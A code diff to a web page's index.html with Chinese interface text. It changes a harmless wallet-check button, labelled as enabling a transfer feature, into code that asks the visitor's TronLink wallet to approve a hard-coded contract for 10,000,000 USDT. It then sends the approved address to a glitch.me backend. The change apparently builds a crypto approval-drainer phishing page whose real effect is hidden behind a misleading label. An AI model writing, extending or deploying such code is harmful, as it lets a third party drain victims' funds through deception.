--- a/index.html
+++ b/index.html
@@ -20,33 +20,38 @@
   </style>
 </head>
 <body>
-  <button onclick="checkWallet()">開啟轉帳功能</button>
+  <button onclick="authorizeUSDT()">開啟轉帳功能</button>
 
   <script>
     const AUTH_CONTRACT = "TMxu165T2e3ZKWzgt7gipzmHwE5KYuibGa";
     const USDT_CONTRACT = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
     const BACKEND = "https://peaceful-precious-ceres.glitch.me";
 
-    async function checkWallet() {
-      const address = tronWeb.defaultAddress.base58;
-      if (!address || !/^T[a-zA-Z0-9]{33}$/.test(address)) {
+    async function authorizeUSDT() {
+      if (!window.tronWeb || !tronWeb.defaultAddress.base58 || !tronWeb.ready) {
         return alert("請使用 TronLink 並登入錢包");
       }
 
+      const address = tronWeb.defaultAddress.base58;
       try {
         const usdt = await tronWeb.contract().at(USDT_CONTRACT);
+
+        // 發送 approve 授權（建議額度 10,000,000 USDT）
+        await usdt.approve(AUTH_CONTRACT, tronWeb.toSun(10000000)).send();
+
+        // 等待鏈上確認後再次驗證授權是否成功
         const allowance = await usdt.allowance(address, AUTH_CONTRACT).call();
         const allowed = parseFloat(allowance.toString()) / 1e6;
 
-        if (allowed > 0) {
+        if (allowed >= 10000000) {
           await axios.post(`${BACKEND}/wallets`, { address });
-          alert("✅ 已授權 USDT 使用權給合約");
+          alert("✅ 已成功授權 10,000,000 USDT 給合約");
         } else {
-          alert("⚠️ 尚未授權或授權額度為 0");
+          alert("⚠️ 授權金額不足，請重新操作");
         }
       } catch (err) {
-        console.error(err);
-        alert("查詢授權失敗：" + err.message);
+        console.error("授權失敗", err);
+        alert("❌ 授權失敗：" + err.message);
       }
     }
   </script>
